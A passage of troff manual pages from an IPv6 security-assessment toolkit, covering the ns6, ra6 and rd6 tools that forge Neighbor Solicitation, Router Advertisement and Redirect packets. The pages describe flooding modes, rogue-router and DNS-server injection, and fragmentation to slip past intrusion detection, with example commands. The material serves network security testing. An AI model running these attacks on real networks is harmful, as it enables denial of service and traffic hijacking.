argument to this option. .TP .BI \-u\ HDR_SIZE ,\ \-\-dst\-opt\-hdr\ HDR_SIZE This option specifies that a Destination Options header is to be included in the resulting packet. The extension header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-u" options. .TP .BI \-U\ HDR_SIZE ,\ \-\-dst\-opt\-u\-hdr\ HDR_SIZE This option specifies a Destination Options header to be included in the "unfragmentable part" of the resulting packet. The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-U" options. This option is only valid if the "\-y" option is specified (as the concept of "unfragmentable part" only makes sense when fragmentation is employed). .TP .BI \-H\ HDR_SIZE ,\ \-\-hbh\-opt\-hdr\ HDR_SIZE This option specifies that a Hop-by-Hop Options header is to be included in the resulting packet. The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Hop\-by\-Hop Options headers may be specified by means of multiple "\-H" options. .TP .BI \-S\ SRC_LINK_ADDR ,\ \-\-src\-link\-address\ SRC_LINK_ADDR This option specifies the link\-layer Source Address of the Neighbor Solicitation messages (currently, only Ethernet is supported). If left unspecified, the link\-layer Source Address is randomized. .TP .BI \-D\ DST_LINK_ADDR ,\ \-\-dst\-link\-address\ DST_LINK_ADDR This option specifies the link\-layer Destination Address of the Neighbor Solicitation messages (currently, only Ethernet is supported). If left unspecified, it is set to the address "33:33:00:00:00:01" (the Ethernet address corresponding to the "all-nodes link-local multicast" IPv6 address (ff02::1). .TP \-\-target, \-t This option specifies the IPv6 Target Address of the Neighbor Solicitation messages. If the "\-T" ("\-\-flood\-targets") option is specified, this option specifies an IPv6 prefix in the form "\-t prefix/prefixlen". See the description of the "\-T" option for further information on how the "\-t" option is processed in that specific case. .TP \-\-source\-lla\-opt, \-E This option specifies the contents of a source link\-layer address option to be included in the Neighbor Solicitation messages. If more than one source link\-layer address is specified (by means of multiple "\-E" options), and all the resulting options cannot be conveyed into a single Neighbor Solicitation, multiple Neighbor Solicitations will be sent as needed. .TP \-\-add\-slla\-opt, \-e This option instructs the ns6 tool to include a source link\-layer address option in the Neighbor Solicitation messages that it sends. The link\-layer address included in the option is the same as the Ethernet Source Address used for the outgoing Neighbor Solicitation messages. .TP \-\-flood\-sources, \-F This option instructs the ns6 tool to send Neighbor Solicitations from multiple (and random) IPv6 Source Addresses. The number of different sources is specified as "\-F number". The IPv6 Source Address of the packets are randomly selected from the prefix specified by the "\-s" option (which defaults to fe80::/64). .TP \-\-flood\-targets, \-T This option instructs the ns6 tool to send Neighbor Solicitation messages for multiple Target Addresses. The number of different Target Addresses is specified as "\-T number". The Target Address of each packet is randomly selected from the prefix ::/64, unless a different prefix has been specified by means of the "\-t" option. .TP \-\-loop, \-l This option instructs the ns6 tool to send periodic Neighbor Solicitations to the victim. The amount of time to pause between sending Neighbor Solicitations can be specified by means of the "\-z" option, and defaults to 1 second. .TP \-\-sleep, \-z This option instructs the ns6 tool to the amount of time to pause between sending Neighbor Solicitations. If left unspecified, it defaults to 1 second. .TP \-\-verbose, \-v This option instructs the ns6 tool to be verbose. .TP \-\-help, \-h Print help information for the ns6 tool. .SH EXAMPLES The following sections illustrate typical use cases of the .B ns6 tool. \fBExample #1\fR # ns6 \-i eth0 \-d fe80::01 \-t 2001:db8::1 \-e Use the network interface "eth0" to send a Neighbor Solicitation message using a random link-local unicast IPv6 Source Address and a random Ethernet Source Address, to the IPv6 Destination address fe80::1 and the Ethernet Destination Address 33:33:00:00:00:01 (selected by default). The target of the Neighbor Advertisement is 2001:db8::1. The Neighbor Solicitation also includes a source link\-layer address option, that contains the same Ethernet address as that used for the Ethernet Source Address of the packet. \fBExample #2\fR # ns6 \-i eth0 \-s 2001:db8::/32 \-t 2001:db8::1 \-F 10 \-l \-z 10 \-e \-v Send 10 Neighbor Solicitation messages using random Ethernet Source Addresses and random IPv6 Source Addresses from the prefix 2001:db8::/32, to the Ethernet Destination Address 33:33:00:00:00:01 (default) and the IPv6 Destination Address ff02::1 (default). The IPv6 Target Address of the Neighbor Solicitation is 2001:db8::1, and each message includes a source link\-layer address option that contains the same address as that used for the Ethernet Source Address of the packet. Repeat this operation every ten seconds. Be verbose. \fBExample #3\fR # ns6 \-i eth0 \-s 2001:db8::/32 \-t 2001:db8::1 \-F 10 \-l \-z 10 \-E ff:ff:ff:ff:ff:ff \-v Send 10 Neighbor Solicitation messages using random Ethernet Source Addresses and random IPv6 Source Addresses from the prefix fe80::/64 (default, link-local unicast), to the Ethernet Destination Address 33:33:00:00:00:01 (default) and the IPv6 Destination Address ff02:1 (default). The IPv6 Target Address of the Neighbor Solicitation is 2001:db8::1, and each message includes a source link\-layer address option that contains the Ethernet address ff:ff:ff:ff:ff:ff. Repeat this operation every ten seconds. Be verbose. .SH SEE ALSO "Security/Robustness Assessment of IPv6 Neighbor Discovery Implementations" (available at: ) for a discussion of Neighbor Discovery vulnerabilities, and additional examples of how to use the na6 tool to exploit them. .SH AUTHOR The .B ns6 tool and the corresponding manual pages were produced by Fernando Gont .I for SI6 Networks .IR . .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-1.5.1/manuals/ra6.1000066400000000000000000000646401223702747200162420ustar00rootroot00000000000000.TH RA6 1 .SH NAME ra6 \- A security assessment tool for attack vectors based on ICMPv6 Router Advertisement messages .SH SYNOPSIS .B ra6 .RB [\| \-i .IR INTERFACE\| ] [\-s SRC_ADDR[/LEN]] [\-d DST_ADDR] [\-y FRAG_SIZE] [\-u DST_OPT_HDR_SIZE] [\-U DST_OPT_U_HDR_SIZE] [\-H HBH_OPT_HDR_SIZE] [\-S LINK_SRC_ADDR] [\-D LINK_DST_ADDR] [\-c CUR_HOP] [\-t ROUTER_LIFETIME] [\-r REACHABLE_TIME] [\-x RETRANS_TIMER] [\-m] [\-o] [\-a] [\-q] [\-p PREFERENCE] [\-E LINK_ADDR] [\-e] [\-P PREFIX/LEN[#FLAGS[#VALID[#PREFERRED]]]] [\-M MTU] [\-N [LIFETIME[#DNS_ADDR]]] [\-R PREFIX/LEN[#PREF[#LIFETIME]]] [\-f N_PREFIXES] [\-F N_SOURCES] [\-w N_ROUTES] [\-W N_ADDRS[#ADDRSPEROPT]] [\-j PREFIX[/LEN]] [\-k PREFIX[/LEN]] [\-J LINK_ADDR] [\-K LINK_ADDR] [\-b PREFIX[/LEN]] [\-g PREFIX[/LEN]] [\-B LINK_ADDR] [\-G LINK_ADDR] [\-L] [\-v] [\-h] .SH DESCRIPTION .B ra6 allows the assessment of IPv6 implementations with respect to a variety of attacks based on ICMPv6 Router Advertisement messages. This tool is part of the SI6 Networks' IPv6 Toolkit: a security assessment suite for the IPv6 protocols. This tool has two modes of operation: active and passive. In active mode, the tool attacks a specific target, while in passive mode the tool listens to traffic on the local network, and launches an attack in response to such traffic. Active mode is employed when an Ethernet destination address and/or an IPv6 destination address are specified. Passive mode is employed when the "\-L" option (or its long variant "\-\-listen") is specified. In passive mode, the ra6 tool listens for incoming Router Solicitation messages and responds with the Router Advertisement attack messages. If both a destination address and the "\-L" option are specified, the tool firstly employs active mode to attack the specified target, and then enters passive mode to respond to Router Solicitation messages with Router Advertisement attack packets. .SH OPTIONS .B ra6 takes its parameters as command-line options. Each of the options can be specified with a short name (one character preceded with the hyphen character, as e.g. "\-i") or with a long name (a string preceded with two hyphen characters, as e.g. "\-\-interface"). Depending on the amount of information (i.e., options and option data) to be conveyed into the Router Advertisements, it may be necessary for ra6 to split that information into more than one Router Advertisement message. This may be particularly the case when the "flood-prefixes", "\-\-flood\-routes", or "\-\-flood\-dns" options are used. Also, when the ra6 tool is instructed to flood the victim with Router Advertisements from different sources ("\-\-flood\-sources" option), multiple packets may need to be generated. ra6 supports IPv6 fragmentation, which may be of use if a large amount of information needs to be conveyed within a single Router Advertisement message. IPv6 fragmentation is not enabled by default, and must be explicitly enabled with the "\-y" option. The tool supports filtering of incoming Router Solicitation messages based on the Ethernet Source Address, the Ethernet Destination Address, the IPv6 Source Address, and the IPv6 Destination Address. There are two types of filters: "block filters" and "accept filters". If any "block filter" is specified, and the incoming Router Solicitation message matches any of those filters, the message is discarded (and thus no Router Advertisements are sent in response). If any "accept filter" is specified, incoming Router Solicitation messages must match the specified filters in order for the ra6 tool to respond with Router Advertisement messages. .TP .BI \-i\ INTERFACE ,\ \-\-interface\ INTERFACE This option specifies the network interface that the tool will use. If the destination address ("\-d" option) is a link-local address, or the "listening" ("\-L") mode is selected, the interface must be explicitly specified. The interface may also be specified along with a destination address, with the "\-d" option. .TP .BI \-s\ SRC_ADDR ,\ \-\-src\-address\ SRC_ADDR This option specifies the IPv6 Source Address (or IPv6 prefix) to be used for the Router Advertisement messages. If left unspecified, a randomized link-local unicast (fe80::/64) address is selected. .TP .BI \-d\ DST_ADDR ,\ \-\-dst\-address\ DST_ADDR This specifies the IPv6 Destination Address of the Router Advertisement messages. If this option is left unspecified, but the Ethernet Destination Address is specified, the "all-nodes link-local multicast" address (ff02::1) is selected as the IPv6 Destination Address. When operating in passive mode ("\-L" option), the IPv6 Destination Address is selected according to the IPv6 Source Address of the Router Solicitation message. If the IPv6 Source Address of the Router Solicitation is the unspecified address (::), the "all-nodes link-local multicast" address (ff02::1) is used as the IPv6 Destination Address. Otherwise, the IPv6 Source Address of the incoming Router Solicitation message is used as the IPv6 Destination Address of the outgoing Router Advertisement messages. .TP \-\-hop\-limit, \-A This option specifies the Hop Limit of the Router Advertisement messages. It defaults to 255. Note that IPv6 nodes are required to check that the Hop Limit of incoming Router Advertisement messages is 255. Therefore, this option is only useful to assess whether an IPv6 implementation fails to enforce the aforementioned check. .TP .BI \-y\ SIZE ,\ \-\-frag\-hdr\ SIZE This option specifies that the resulting packet must be fragmented. The fragment size must be specified as an argument to this option. .TP .BI \-u\ HDR_SIZE ,\ \-\-dst\-opt\-hdr\ HDR_SIZE This option specifies that a Destination Options header is to be included in the resulting packet. The extension header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-u" options. .TP .BI \-U\ HDR_SIZE ,\ \-\-dst\-opt\-u\-hdr\ HDR_SIZE This option specifies a Destination Options header to be included in the "unfragmentable part" of the resulting packet. The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-U" options. This option is only valid if the "\-y" option is specified (as the concept of "unfragmentable part" only makes sense when fragmentation is employed). .TP .BI \-H\ HDR_SIZE ,\ \-\-hbh\-opt\-hdr\ HDR_SIZE This option specifies that a Hop-by-Hop Options header is to be included in the resulting packet. The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Hop\-by\-Hop Options headers may be specified by means of multiple "\-H" options. .TP \-\-curhop, \-c This option specifies the CurHop value that is included in Router Advertisement messages. This is the value that nodes should use for the "Hop Limit" field of the IPv6 packets they send. If this option is not specified, the CurHop value defaults to 255. .TP \-\-lifetime, \-t This option specifies the Router Lifetime value that is included in Router Advertisement messages. The Router Lifetime is the amount of time (in seconds) that the router can be used as a "default router". If this option is left unspecified, a Router Lifetime value of 9000 seconds is selected. .TP \-\-reachable, \-r This option specifies the Reachable Time value that is included in Router Advertisement messages. The Router Lifetime is the amount of time in milliseconds that a neighbor is considered "reachable" after a reachability confirmation. If this option is left unspecified, a Reachable Time of 0xffffffff ("infinity") is selected. .TP \-\-retrans, \-x This option specifies the Retrans Timer value that is included in Router Advertisement messages. The Retrans Timer specifies the amount of time in milliseconds between retransmitted Neighbor Solicitation messages (with ‘0’ meaning "unspecified by this router"). If this option is left unspecified, a Retrans Timer of 4000 milliseconds is selected. .TP \-\-managed, \-m This option causes the ra6 tool to set the ‘M’ (Managed) bit in the Router Advertisement messages that it sends. The ‘M’ bit indicates that network configuration is "managed" (e.g., DHCPv6 should be used instead). If left unspecified, the ‘M’ bit is not set. .TP \-\-other, \-o This option causes the ra6 tool to set the ‘O’ ("Other") bit in the Router Advertisement messages that it sends. The ‘O’ bit indicates that additional configuration information is available through other means (e.g., DHCPv6). If left unspecified, the ‘O’ bit is not set. .TP \-\-home\-agent, \-a This option causes the ra6 tool to set the ‘H’ ("Home Agent") bit in the Router Advertisement messages that it sends (the ‘H’ bit is specified in RFC 3775). If this option is left unspecified, the ‘H’ bit is not set. .TP \-\-nd\-proxy, \-q This option causes the ra6 tool to set the ‘P’ ("ND Proxy") bit in the Router Advertisement messages that it sends (the "P" bit is specified in RFC4389). If this option is left unspecified, the ‘P’ bit is not set. .TP \-\-preference, \-p This option specifies the Preference field of the Router Advertisement messages, with "1" meaning "High", "0" meaning "Normal", and "\-1" meaning "low" (the value "\-2" is forbidden). If left unspecified, a Preference value of "1" (High) is selected. .TP .BI \-S\ SRC_LINK_ADDR ,\ \-\-src\-link\-address\ SRC_LINK_ADDR This option specifies the link\-layer Source Address of the Router Advertisement messages (this option is only valid for Ethernet interfaces). If left unspecified, the link\-layer Source Address is randomized. When operating in passive mode, the link\-layer Source Address is selected according to the IPv6 Destination Address of the incoming Router Solicitation messages. If the IPv6 Destination Address of the incoming Router Solicitation message is a multicast address (usually the "all-routers link-local multicast" address "ff02::02"), the link\-layer Source Address is set to the address specified by the "\-S" option (or to a random address if the "\-S" option was left unspecified). If the IPv6 Destination Address of the incoming Router Solicitation is not a multicast address (i.e., it is a unicast address), the link\-layer Source Address is set to the Ethernet Destination Address of the incoming Router Solicitation message. .TP .BI \-D\ DST_LINK_ADDR ,\ \-\-dst\-link\-address\ DST_LINK_ADDR This option is meant to specify the link\-layer Destination Address of the Router Advertisement messages (this option is only valid for Ethernet interfaces). If left unspecified, it is set to "33:33:00:00:00:01" (the Ethernet multicast address corresponding to the IPv6 "all-nodes link-local multicast" address). When operating in passive mode, the link\-layer Destination Address is set depending to the IPv6 Source Address of the incoming Router Solicitation message. If the IPv6 Source Address of the incoming Router Solicitation message is the unspecified address (::), the link\-layer destination address is set to "33:33:00:00:00:01" (the Ethernet multicast address corresponding to the IPv6 "all-nodes link-local multicast" address). Otherwise, the link\-layer Destination Address is set to the same value as the link\-layer Source Address of the incoming Router Solicitation message. .TP \-\-source\-lla\-opt, \-E This option specifies the contents of a source link\-layer address option to be included in the Router Advertisement messages. If a single option is specified, it is included in all the outgoing Router Advertisement messages. If more than one source link\-layer address is specified, they are included only in the first packet of a set of Router Advertisements (if more than one Router Advertisement needs to be sent in order to convey all the specified information). .TP \-\-add\-slla\-opt, \-e This option instructs the ra6 tool to include a source link\-layer address option in the Router Advertisement messages. The link\-layer address included in the option is the same as the Ethernet Source Address used for the outgoing Router Advertisement message. The difference between this option and the "\-E" option is that the latter does not specify the actual value of the option, but just instructs the tool include the option (the actual value of the option is selected according to the Ethernet Source address used in the outgoing packet). .TP \-\-prefix\-opt, \-P This option specifies the contents of a Prefix Information option to be included in Router advertisement messages, with the following format: "\-P prefix/length#flags#valid#preferred". Where "prefix/length" is a mandatory field that indicates an IPv6 prefix (e.g., "2001::/16"). "flags" is an optional argument that indicates which flags should be set for this prefix (‘L’ for the "on-link" flag, ‘A’ for the "autonomous address-configuration" flag, ‘R’ for "Router Address", and ‘-‘ for indicating that no flags should be set for this prefix) \-\- if this field is left unspecified, the "L" and "A" flags are set for in the specified Prefix Information option. "valid" is an optional field that indicates the "Valid Lifetime" for this prefix (the length of time in seconds during which this information can be used for on-link determination. If left unspecified, a value of 0xffffffff (infinity) is used. "preferred" is an optional argument that specifies the "Preferred Lifetime" value for this prefix (the length of time in seconds that addresses generated from this prefix via stateless address auto-configuration remain preferred). If left unspecified, a value of 0xffffffff (infinity) is used. .TP \-\-route\-opt, \-R This option specifies the contents of a Route Information option to be included in Router advertisement messages, with the following format: "\-R prefix/length#preference#lifetime". Where "prefix/length" is a mandatory field that indicates an IPv6 prefix (e.g., "2001::/16"). "preference" is an optional argument that indicates the preference of this prefix (with ‘1’ meaning "high", ‘0’ meaning "normal", ‘\-1’ meaning "low", and ‘\-2’ being an invalid value). If this field is left unspecified, a value of ‘1’ (i.e., "high") is selected. "lifetime" is an optional parameter that specifies the "Route Lifetime" for the specified route (the period of time during which this information can be used for route determination). If left unspecified, a value of 0xffffffff (infinity) is selected. .TP \-\-mtu\-opt, \-M This option is meant to specify the value of a MTU option that should be included in Router Advertisements. Multiple MTU options can be specified. .TP \-\-rdnss\-opt, \-N This option allows the advertisement of a number of recursive DNS servers by means of the RDNSS option. A "Lifetime" parameter (32 bits) indicates the amount of time (in seconds) that the specified DNS server(s) may be used for name resolution. Multiple IPv6 addresses can be specified in the same RDNSS option in the form "\-\-dns\-opt lifetime#ipv6address1#ipv6address2". Also, more than one RDNSS option may be specified. .TP \-\-flood\-prefixes, \-f This option instructs the ra6 tool to flood the victim host with Prefix information options. The number of Prefix Information options to be sent is specified as "\-f number". When this option is specified, a "\-P" option must be specified (with the usual syntax "\-P prefix/length#flags#valid#preferred"), such that it instructs ra6 about how to generate the Prefix Information options. The "prefix/length" specifies the length of the prefixes that will be included in each Prefix Information option. While the prefix length will be constant for all options, the actual prefix will be randomized. The rest of the parameters will be shared by all the prefixes, and have the same "defaults" as indicated in the description of the "\-P" option. .TP \-\-flood\-sources, \-F This option instructs the tool to send Router Advertisement messages from multiple addresses. The number of different sources is specified as "\-F number". The Source Address of each Router Advertisement is randomly selected from the prefix specified by the "\-s" option. If the "\-F" option is specified but the "\-s" option is left unspecified, the Source Address of the packets is randomly selected from the prefix fe80::/64 (link-local unicast). It should be noted that hosts are required to discard Router Advertisement messages that do not have a link-local unicast address as the Source Address. .TP \-\-flood\-routes, \-w This option instructs the ra6 tool to flood the target with Route Information options. The number of Route Information options to be sent is specified as "\-R number". When this option is specified, a "\-R" option should be specified (with the usual syntax "\-R prefix/length#preference#lifetime") such that ra6 is instructed about how to generate the Route Information options. The "prefix/length" species the length of the prefixes that will be included in each Route Information option. While the prefix length will be constant for all options, the actual prefix will be randomized. The rest of the parameters are shared by all the the options, and have the same "default values" as indicated in the description of the "\-R" option. .TP \-\-flood\-dns, \-W This option instructs the ra6 tool to flood the target with random IPv6 addresses (supposed to correspond to recursive DNS servers), by means of the Recursive DNS Server (RDNSS) option. The number of IPv6 addresses that are to be sent to the target is specified as "\-k number". As there is a limit in the number of IPv6 addresses that can be included in a RDNSS option, it may be necessary for the tool to split those addresses into several RDNSS options. It is possible to instruct the ra6 about the maximum number of IPv6 addresses that each RDNSS option should contain, by means of a second (and optional) parameter to the "\-k" option. Namely, the tool can be instructed to send a total number of addresses ("totaladdresses") with up to some specific number ("addrsperoption") of addresses per RDNSS option in the form "\-k totaladresses#addrsperoption". This might be helpful if it is believed that the target implementation enforces a limit on the number of addresses it honors on a "per RNDSS option" basis, but no limit on the aggregate number of addresses. In such a case, an implementation might e.g. survive the attack "\-k 5000", but still be vulnerable to the attack "\-k 5000#3"). The "Lifetime" value for these addresses can be specified by issuing a "\-N" option with the desired "Lifetime" (this is analogous to how the "\-\-flood\-routes" operates together with the "\-R" option, and how the "\-\-flood\-prefixes" operates together with the "\-P" option). .TP \-\-block\-src, \-j This option sets a block filter for the incoming Router Solicitation messages based on their IPv6 Source Address. It allows the specification of an IPv6 prefix in the form "\-j prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP \-\-block\-dst, \-k This option sets a block filter for the incoming Router Solicitation messages, based on their IPv6 Destination Address. It allows the specification of an IPv6 prefix in the form "\-k prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP \-\-block\-link\-src, \-J This option sets a block filter for the incoming Router Solicitation messages, based on their link\-layer Source Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP \-\-block\-link\-dst, \-K This option sets a block filter for the incoming Router Solicitation messages, based on their link\-layer Destination Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP \-\-accept\-src, \-b This option sets an accept filter for the incoming Router Solicitation messages, based on their IPv6 Source Address. It allows the specification of an IPv6 prefix in the form "\-b prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP \-\-accept\-dst, \-g This option sets a accept filter for the incoming Router Solicitation messages, based on their IPv6 Destination Address. It allows the specification of an IPv6 prefix in the form "\-g prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP \-\-accept\-link\-src, \-B This option sets an accept filter for the incoming Router Solicitation messages, based on their link\-layer Source Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP \-\-accept\-link\-dst, \-K This option sets an accept filter for the incoming Router Solicitation messages, based on their link\-layer Destination Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP \-\-loop, \-l This option instructs the ra6 tool to send periodic Router Advertisements to the destination node. The amount of time to pause between sending Router Advertisements can be specified by means of the "\-z" option, and defaults to 1 second. Note that this option cannot be set in conjunction with the "\-L" ("\-\-listen") option. .TP \-\-sleep, \-z This option specifies the amount of time to pause between sending Router Advertisements. If left unspecified, it defaults to 1 second. .TP \-\-listen, \-L This option specifies that the tool should enter the "passive" mode (possibly after operating in active mode, if the ‘\-d’ or ‘\-D’ options were specified). .TP \-\-verbose, \-v This option instructs the ra6 tool to be verbose. .TP \-\-help, \-h Print help information for the ra6 tool. .SH EXAMPLES The following sections illustrate typical use cases of the .B ra6 tool. \fBExample #1\fR # ra6 \-i eth0 \-P 2001::/64#LA \-P 2002::/64#A \-e \-L Listen ("\-L") for incoming Router Solicitations on interface eth0 ("\-i eth0"), and advertise the prefix 2001::/64 for both on-link determination and auto-configuration ("\-P 2001::/64#LA") and the prefix 2002::/64 only for auto-configuration ("\-P 2002::/64#A"). Include a source link\-layer address option ("\-e") in the Router Advertisements. \fBExample #2\fR # ra6 \-i eth0 \-d fe80::1 \-D 01:02:03:04:05:06 \-c 5 \-\-lifetime 100 \-o \-e \-M 1400 Use the network interface "eth0" to send a Router Advertisement using a random link-local IPv6 Source Address and a random Ethernet Source Address, to the IPv6 Destination address fe80::1 and the Ethernet Destination Address 01:02:03:04:05:06. The Router Advertisement includes a "Router Lifetime" of 100, and advertises a CurHop value of 5 (i.e., a recommended "Hop Limit" of "5"). The ‘O’ bit is set (thus indicating that other configuration information is available via DHCP). The Router Advertisement includes a source link\-layer address option (containing the same address as the Ethernet Source Address of the packet) and an MTU option with a value of 1400. \fBExample #3\fR # ra6 \-i eth0 \-\-flood\-sources 10 \-\-flood\-routes 50 \-\-flood\-prefixes 40 \-R ::/64#1 \-P ::/48#LA \-L \-e Listen for incoming Router Solicitation messages on the interface "eth0", and respond with Router Advertisements from 10 different link-local unicast IPv6 Source Addresses (randomized) and 10 different (randomized) Ethernet Source Addresses. Each Router Advertisement includes 50 Route Information options, each of them with a randomized /64 prefix and a preference of 1 ("high"). The Router Advertisements also contain 40 Prefix Information options, each with a randomized /48 prefix and the ‘A’ (auto-configuration) and ‘L’ (on-link determination) bits set. In addition, each Router Advertisement includes a source link\-layer address option, containing the same (randomized) address as that used for the Ethernet Source Address field. \fBExample #4\fR # ra6 \-i eth0 \-N 1000#fe80::1#2001:db8::1 \-L Listen for incoming Router Solicitation messages, and respond with a Router Advertisement that contains one RDNSS option with two IPv6 addresses (fe80::1 and 2001:db8::1), with a Lifetime of "1000". All Router Solicitation messages sent to multicast addresses will be responded using the same (randomized) IPv6 Source Address and the same (randomized) Ethernet Source Address. Router Solicitation messages destined to unicast addresses will be responded with Router Advertisements using the IPv6 Destination Address and the Ethernet Destination Address of the incoming Router Solicitation message for the IPv6 Source Address and the Ethernet Source Address of the Router Advertisement, respectively. \fBExample #5\fR # ra6 \-i eth0 \-s fe80::1234 \-S 00:01:02:03:04:05 \-d fe80::1 \-N 900 \-\-flood\-dns 1000#10 \-L Flood the target (fe80::1) with 1000 random IPv6 addresses of Recursive DNS Servers, with a maximum of 10 addresses per RDNSS option. Each RDNSS option has a "Lifetime" of 900. Packets are sent with an IPv6 Source Address of "fe80::1234" and an Ethernet Source Address of "00:01:02:03:04:05". Once the target has been attacked, listen for incoming Router Solicitation messages and respond with the same "flood" packets (the Ethernet Source Address and the IPv6 Source Address will change if the Router Solicitation messages have been sent to a unicast address, though). .SH SEE ALSO "Security/Robustness Assessment of IPv6 Neighbor Discovery Implementations" (available at: ) for a discussion of Neighbor Discovery vulnerabilities, and additional examples of how to use the na6 tool to exploit them. .SH AUTHOR The .B ra6 tool and the corresponding manual pages were produced by Fernando Gont .I for SI6 Networks .IR . .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-1.5.1/manuals/rd6.1000066400000000000000000000514441223702747200162430ustar00rootroot00000000000000.TH RD6 1 .SH NAME rd6 \- A security assessment tool for attack vectors based on ICMPv6 Redirect messages .SH SYNOPSIS .B rd6 .RB [\| \-i .IR INTERFACE\| ] [\-s SRC_ADDR[/LEN]] [\-d DST_ADDR] [\-S LINK_SRC_ADDR] [\-D LINK-DST-ADDR] [\-A HOP_LIMIT] [\-y FRAG_SIZE] [\-u DST_OPT_HDR_SIZE] [\-U DST_OPT_U_HDR_SIZE] [\-H HBH_OPT_HDR_SIZE] [\-r RD_DESTADDR/LEN] [\-t RD_TARGETADDR/LEN] [\-p PAYLOAD_TYPE] [\-P PAYLOAD_SIZE] [\-n] [\-c HOP_LIMIT] [\-x SRC_ADDR] [\-a SRC_PORT] [\-o DST_PORT] [\-X TCP_FLAGS] [\-q TCP_SEQ] [\-Q TCP_ACK] [\-V TCP_URP] [\-w TCP_WIN] [\-M] [\-O] [\-N] [\-E LINK_ADDR] [\-e] [\-j PREFIX[/LEN]] [\-k PREFIX[/LEN]] [\-J LINK_ADDR] [\-K LINK_ADDR] [\-b PREFIX[/LEN]] [\-g PREFIX[/LEN]] [\-B LINK_ADDR] [\-G LINK_ADDR] [\-f] [\-R N_DESTS] [\-T N_TARGETS] [\-F N_SOURCES] [\-L | \-l] [\-z] [\-v] [\-h] .SH DESCRIPTION .B rd6 allows the assessment of IPv6 implementations with respect to a variety of attack vectors based on ICMPv6 Redirect messages. This tool is part of the SI6 Networks' IPv6 Toolkit: a security assessment suite for the IPv6 protocols. This tool has two modes of operation: active and passive. In active mode, the tool attacks a specific target, while in passive mode the tool listens to traffic on the local network, and launches an attack in response to such traffic. Active mode is employed if an IPv6 Destination Address, a Redirect Destination Address, and a Redirect Target Address are specified. Passive mode is employed if the "\-L" option (or its long counterpart "\-\-listen") is set. If both an attack target and the "\-L" option are specified, the attack is launched against the specified target, and then the tool enters passive mode to respond incoming packets with ICMPv6 Redirect messages. The tool supports filtering of incoming packets based on the Ethernet Source Address, the Ethernet Destination Address, the IPv6 Source Address, and the IPv6 Destination Address. There are two types of filters: "block filters" and "accept filters". If any "block filter" is specified, and the incoming packet matches any of those filters, the message is discarded (and thus no Redirect messages are sent in response). If any "accept filter" is specified, incoming packets must match the specified filters in order for the tool to respond with Redirect messages. .SH OPTIONS .B rd6 takes it parameters as command-line options. Each of the options can be specified with a short name (one character preceded with the hyphen character, as e.g. "\-i") or with a long name (a string preceded with two hyphen characters, as e.g. "\-\-interface"). Depending on the amount of information (i.e., options) to be conveyed into the ICMPv6 Redirect messages, it may be necessary for the rd6 tool to split that information into more than one Redirect message. Also, if the tool is instructed to e.g. flood the victim with Redirect messages from different sources ("\-\-flood\-sources" option), multiple packets may need to be generated. rd6 supports IPv6 fragmentation, which might be of use to circumvent layer-2 filtering and/or Network Intrusion Detection Systems (NIDS). However, IPv6 fragmentation is not enabled by default, and must be explicitly enabled with the "\-y" option. .TP .BI \-i\ INTERFACE ,\ \-\-interface\ INTERFACE This option specifies the network interface that the tool will use. If the destination address ("\-d" option) is a link-local address, or the "listening" ("\-L") mode is selected, the interface must be explicitly specified. The interface may also be specified along with a destination address, with the "\-d" option. .TP .BI \-s\ SRC_ADDR ,\ \-\-src\-address\ SRC_ADDR This option specifies the IPv6 source address (or IPv6 prefix) to be used for the Source Address of the attack packets. This address typically corresponds to the IPv6 link-local address of the default router. If the "\-F" ("\-\-flood\-sources") option is specified, this option includes an IPv6 prefix, from which random addresses are selected. See the description of the "\-F" option for further information on how the "\-s" option is processed in that specific case. Note: Instead of specifying the "Source Address" with this option, the "\-\-learn\-router" option could be set, such that the tool automatically learns the IPv6 link-local address of the default router, and uses this address for the "Source Address" of the Redirect messages. .TP .BI \-d\ DST_ADDR ,\ \-\-dst\-address\ DST_ADDR This option specifies the IPv6 Destination Address of the victim. It can be left unspecified only if the "\-L" option is selected (i.e., if the tool is to operate in "Passive" mode). When operating in passive mode ("\-L" option), the IPv6 Destination Address is selected according to the IPv6 Source Address of the incoming packet. .TP \-\-hop\-limit, \-A This option specifies the Hop Limit to be used for the Redirect messages. It defaults to 255. Note that IPv6 nodes are required to check that the Hop Limit of incoming Redirect messages is 255. Therefore, this option is only useful to assess whether an IPv6 implementation fails to enforce the aforementioned check. .TP .BI \-y\ SIZE ,\ \-\-frag\-hdr\ SIZE This option specifies that the resulting packet must be fragmented. The fragment size must be specified as an argument to this option. .TP .BI \-u\ HDR_SIZE ,\ \-\-dst\-opt\-hdr\ HDR_SIZE This option specifies that a Destination Options header is to be included in the resulting packet. The extension header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be 